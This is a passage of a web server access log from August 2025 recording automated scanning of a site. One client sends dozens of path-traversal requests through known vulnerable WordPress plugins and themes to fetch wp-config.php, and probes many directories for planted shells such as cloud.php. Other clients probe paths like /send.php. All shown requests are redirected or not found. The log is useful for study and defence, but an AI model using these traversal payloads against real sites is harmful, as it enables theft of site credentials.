(Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:33 -0400] "GET /cms.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:36 -0400] "GET /wp-uploads.php HTTP/1.1" 301 249 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:41 -0400] "GET /Gel.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:45 -0400] "GET /41.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:49 -0400] "GET //wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php HTTP/1.1" 301 348 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:12:51 -0400] "GET //wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 301 310 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:13:00 -0400] "GET //wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php HTTP/1.1" 301 367 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:13:03 -0400] "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes HTTP/1.1" 301 369 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:22:13:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:22:13:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:13:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:22:13:06 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:13:18 -0400] "GET //wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php HTTP/1.1" 301 335 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:13:29 -0400] "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 301 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:13:42 -0400] "GET //force-download.php?file=wp-config.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:13:58 -0400] "GET //wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1" 301 342 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:14:20 -0400] "GET //wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php HTTP/1.1" 301 337 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:14:33 -0400] "GET //wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1" 301 325 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:14:59 -0400] "GET //wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php HTTP/1.1" 301 324 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:08 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php HTTP/1.1" 301 329 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:17 -0400] "GET //wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php HTTP/1.1" 301 319 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:28 -0400] "GET //wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php HTTP/1.1" 301 334 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:35 -0400] "GET //wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1" 301 325 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:44 -0400] "GET //wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php HTTP/1.1" 301 313 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:15:52 -0400] "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 301 314 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:02 -0400] "GET //wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1" 301 318 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:14 -0400] "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 301 308 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:27 -0400] "GET //wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php HTTP/1.1" 301 366 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:31 -0400] "GET //wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php HTTP/1.1" 301 312 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:49 -0400] "GET //wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1" 301 334 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:16:53 -0400] "GET //wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1" 301 304 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:17:02 -0400] "GET //wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1" 301 315 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:22:18:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:22:18:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:22:18:37 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:22:18:38 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:19:52 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:23:06 -0400] "GET /.well-known/pki-validation/cloud.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:23:36 -0400] "GET /.well-known/acme-challenge/cloud.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:24:01 -0400] "GET /ccx/index.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:24:31 -0400] "GET /wp-admin/network/cloud.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:22:24:55 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:22:24:55 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:22:24:55 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:22:24:55 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:25:17 -0400] "GET /wp-content/plugins/ccx/index.php HTTP/1.1" 301 267 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:25:43 -0400] "GET /wp-content/themes/ccx/index.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:25:46 -0400] "GET /cloud.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 68.183.245.101 - - [12/Aug/2025:22:26:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:26:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:22:26:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:22:26:50 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:26:56 -0400] "GET /cgi-bin/cloud.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:22:27:50 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:22:27:50 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:22:27:50 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:22:27:50 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:22:27:54 -0400] "GET /css/cloud.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:28:52 -0400] "GET /wp-admin/user/cloud.php HTTP/1.1" 301 258 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:29:52 -0400] "GET /img/cloud.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:30:54 -0400] "GET /wp-admin/css/colors/coffee/cloud.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:31:42 -0400] "GET /wp-admin/images/cloud.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:32:41 -0400] "GET /images/cloud.php HTTP/1.1" 301 251 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:33:47 -0400] "GET /wp-admin/js/widgets/cloud.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:34:41 -0400] "GET /wp-admin/css/colors/cloud.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:22:34:51 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:22:34:52 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:22:34:52 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:22:34:52 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:35:38 -0400] "GET /wp-admin/includes/cloud.php HTTP/1.1" 301 262 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:36:38 -0400] "GET /wp-admin/css/colors/blue/cloud.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:22:37:34 -0400] "GET /wp-admin/cloud.php HTTP/1.1" 301 253 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 212.143.94.239 - - [12/Aug/2025:22:40:52 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 31.13.115.10 - - [12/Aug/2025:22:41:43 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 146.190.11.185 - - [12/Aug/2025:22:42:02 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:42:02 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:22:42:02 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:22:42:02 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 31.186.39.146 - - [12/Aug/2025:22:43:01 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 86.8.204.43 - - [12/Aug/2025:22:43:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:22:43:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:22:43:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:22:43:14 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:22:49:56 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:22:49:56 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:22:49:56 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:22:49:57 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:22:50:17 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:22:54:16 -0400] "GET /cgi-bin/network.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:22:55:14 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:22:55:14 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:22:55:14 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 